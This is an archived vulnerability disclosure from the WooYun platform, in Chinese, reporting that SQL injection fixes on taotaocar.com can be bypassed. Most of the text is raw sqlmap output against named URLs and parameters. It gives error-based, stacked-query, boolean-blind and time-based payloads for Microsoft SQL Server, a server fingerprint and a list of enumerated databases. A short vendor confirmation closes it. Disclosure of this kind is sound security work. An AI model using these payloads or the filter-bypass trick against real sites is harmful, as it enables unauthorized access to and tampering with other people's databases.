乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-07: 细节已通知厂商并且等待厂商处理中 2015-02-09: 厂商已经确认,细节仅向厂商公开 2015-02-19: 细节向核心白帽子及相关领域专家公开 2015-03-01: 细节向普通白帽子公开 2015-03-11: 细节向实习白帽子公开 2015-03-24: 细节向公众公开
233
发现个问题,你们修SQL注入的方法不完善,可能很容易的绕过,刚才把你们的SQL漏洞跑了一遍,除了关站的其他几乎全能绕过。payload:空格替换为/**/
http://m.taotaocar.com:80/paimai/index.aspx (POST)__VIEWSTATE=/wEPDwUJMTE0NzQxODc1D2QWAgIDD2QWBAICDxYCHgtfIUl0ZW1Db3VudAIIFhBmD2QWAmYPFQsPSFowMTIwMTI5MDkzMjEyBDIwMDkCMTAR5LiA5rG95aWl6L%2BqLUE2TCAPSFowMTIwMTI5MDkzMjEyS2h0dHA6Ly91cDIwMTAudGFvdGFvY2FyLmNvbS9VcGxvYWRGaWxlMjAxMC8yMDEyLzktOS8xMjk5MTIzMDEyODY2NDRfbWlkLmpwZxHkuIDmsb3lpaXov6otQTZMIAkyODAwMDAuMDAJ5bey57uT5p2fBuS4quS6ugbmna3lt55kAgEPZBYCZg8VCw9IWjAxMjAxMjkwOTMyMTEEMjAwNgIwMRjkuJzljZct6I%2Bx5biFLUVYaeaJi%2BWKqCAPSFowMTIwMTI5MDkzMjExS2h0dHA6Ly91cDIwMTAudGFvdGFvY2FyLmNvbS9VcGxvYWRGaWxlMjAxMC8yMDEyLzktOS8xMjk5MTIxMTU1MTQ1MTlfbWlkLmpwZxjkuJzljZct6I%2Bx5biFLUVYaeaJi%2BWKqCAIMzUwMDAuMDAJ5bey57uT5p2fBuS4quS6ugbmna3lt55kAgIPZBYCZg8VCw9IWjAxMjAxMjkwNzMyMTAEMjAwNQIxMhjkuJzljZct6I%2Bx5YqoLeixquWNjuWeiyAPSFowMTIwMTI5MDczMjEwS2h0dHA6Ly91cDIwMTAudGFvdGFvY2FyLmNvbS9VcGxvYWRGaWxlMjAxMC8yMDEyLzktNy8xMjk3MTY1MjQ4NjE5NTVfbWlkLmpwZxjkuJzljZct6I%2Bx5YqoLeixquWNjuWeiyAIMzkwMDAuMDAJ5bey57uT5p2fBuS4quS6ugbmna3lt55kAgMPZBYCZg8VCw9IWjAxMjAxMjkwNzMyMDkEMjAwMgIxMCDkuIDmsb3lpKfkvJct5o236L6%2BLTAwLTAy5qy%2BQ0lYIA9IWjAxMjAxMjkwNzMyMDlKaHR0cDovL3VwMjAxMC50YW90YW9jYXIuY29tL1VwbG9hZEZpbGUyMDEwLzIwMTIvOS03LzEyOTcxNjQ3MTkyMDg2X21pZC5qcGcg5LiA5rG95aSn5LyXLeaNt%2Bi%2Bvi0wMC0wMuasvkNJWCAIMTkwMDAuMDAJ5bey57uT5p2fBuS4quS6ugbmna3lt55kAgQPZBYCZg8VCw9IWjAxMjAxMjkwNzMyMDgEMjAwMAIxMijkuIrmtbflpKfkvJct5qGR5aGU57qzMjAwMC3ml7bku6PpqoTlrZAgD0haMDEyMDEyOTA3MzIwOEtodHRwOi8vdXAyMDEwLnRhb3Rhb2Nhci5jb20vVXBsb2FkRmlsZTIwMTAvMjAxMi85LTcvMTI5NzE2NTQzODgyNzc0X21pZC5qcGco5LiK5rW35aSn5LyXLeahkeWhlOe6szIwMDAt5pe25Luj6aqE5a2QIAgxNzAwMC4wMAnlt7Lnu5PmnZ8G5Liq5Lq6BuadreW3nmQCBQ9kFgJmDxULD0haMDEyMDEyOTA3MzIwNwQyMDA2AjAxK%2BWMl%2BS6rOeOsOS7oy3kvIrlhbDnibktMS42TOiHquWKqOixquWNjuWeiyAPSFowMTIwMTI5MDczMjA3S2h0dHA6Ly91cDIwMTAudGFvdGFvY2FyLmNvbS9VcGxvYWRGaWxlMjAxMC8yMDEyLzktNy8xMjk3MTYzNjMzNDY2OTVfbWlkLmpwZyvljJfkuqznjrDku6Mt5LyK5YWw54m5LTEuNkzoh6rliqjosarljY7lnosgCDQ0MDAwLjAwCeW3sue7k%2BadnwbkuKrkuroG5p2t5beeZAIGD2QWAmYPFQsPSFowMTIwMTI5MDYzMjA2BDIwMDgCMDkw5YyX5Lqs546w5LujLeS8iuWFsOeJueaCpuWKqC0xLjboh6rliqjosarljY7lnosgD0haMDEyMDEyOTA2MzIwNktodHRwOi8vdXAyMDEwLnRhb3Rhb2Nhci5jb20vVXBsb2FkRmlsZTIwMTAvMjAxMi85LTYvMTI5NjE3MjEyMDk3NzE3X21pZC5qcGcw5YyX5Lqs546w5LujLeS8iuWFsOeJueaCpuWKqC0xLjboh6rliqjosarljY7lnosgCDYzMDAwLjAwCeW3sue7k%2Badnwnnu4/plIDllYYG5p2t5beeZAIHD2QWAmYPFQsPSFowMTIwMTI5MDYzMjA1BDIwMDECMTAt5LiK5rW35aSn5LyXLeahkeWhlOe6sy3kuJbnuqrmlrDnp4Dln7rmnKzlnosgD0haMDEyMDEyOTA2MzIwNUtodHRwOi8vdXAyMDEwLnRhb3Rhb2Nhci5jb20vVXBsb2FkRmlsZTIwMTAvMjAxMi85LTYvMTI5NjE3MjQyMzcxMzAwX21pZC5qcGct5LiK5rW35aSn5LyXLeahkeWhlOe6sy3kuJbnuqrmlrDnp4Dln7rmnKzlnosgCDEzMDAwLjAwCeW3sue7k%2BadnwbkuKrkuroG5p2t5beeZAIDDw8WAh4LUmVjb3JkY291bnQCfWRkZHypEqeo02g2jhIUdnKY4WF7aUwz&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLi0q%2B%2BBwL0nNqKDN1djBqCarXZ2F%2Bfyfjet/6lcHLP&car_is_sale=0&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2---Parameter: car_is_sale (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0' AND 4516=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4516=4516) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'kDNv'='kDNv&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0'; WAITFOR DELAY '0:0:5'--&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0' WAITFOR DELAY '0:0:5'--&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2Parameter: usertype (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0&car_moneyb=0&usertype=-8016' OR (2970=2970) AND 'WeeK'='WeeK&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA' AND 6637=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6637=6637) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'qgEx'='qgEx&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA'; WAITFOR DELAY '0:0:5'--&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA' WAITFOR DELAY '0:0:5'--&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2012available databases [8]:[*] 2dazi[*] master[*] model[*] msdb[*] taocar_db_122[*] tempdb[*] test[*] xcnews-----------------------------------http://xinche.taotaocar.com/xinche/quanguobaojia.aspx?classid=161011001Parameter: classid (GET) Type: boolean-based blind Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries Payload: classid=161011001'; IF(5896=5896) SELECT 5896 ELSE DROP FUNCTION kNRt-- Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: classid=161011001' AND 7121=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7121=7121) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(106)+CHAR(113))) AND 'YJEc'='YJEc Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: classid=161011001'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: classid=161011001' WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2012available databases [8]:[*] 2dazi[*] master[*] model[*] msdb[*] taocar_db_122[*] tempdb[*] test[*] xcnews
重新设计修复方法。
危害等级:高
漏洞Rank:15
确认时间:2015-02-09 16:08
已开始排查,感谢提交
暂无